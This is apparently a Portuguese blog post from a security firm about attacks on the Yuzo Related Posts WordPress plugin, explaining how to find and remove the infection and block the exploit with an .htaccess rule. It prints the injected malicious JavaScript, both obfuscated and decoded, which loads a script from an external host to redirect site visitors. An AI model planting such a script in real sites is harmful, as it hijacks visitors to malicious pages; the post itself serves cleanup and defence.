Infecção:

Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

O código descriptografado fica dessa maneira:

</style><script language=javascript>var elem = document.createElement(‘script’);

elem.type = ‘text/javascript’;

elem.async = true; elem.src = ‘hxxps://hellofromhony[.]org/counter’;

document.getElementsByTagName(‘head’)[0].appendChild(elem);</script>

Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.

Removendo a infecção:

Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.

Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string “String.fromCharCode(118” ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:

Após isso você verá que o conteúdo foi encontrado na tabela wp_options:

Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.

Contra medida:

Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:

https://wordpress.org/support/topic/remove-this-plugin-immediately/

Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:

RewriteEngine on
ErrorDocument 406 “<head><title>Bad Request!</title></head><body><h1>Blocked by Defensor Web!</h1><p>Hacking Attempt!. </p></body></html>”
RewriteEngine On
RewriteCond %{THE_REQUEST} “POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1” [NC]
RewriteRule .* – [R=406,L]

As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:

https://pastebin.com/GKYBv5Qt

Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.

Site infectado? Não consegue resolver?

Entre em contato agora com nossa consultoria especializada através do link Remoção de Malware em nosso site.

O post [Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção apareceu primeiro em ETH SECURITY.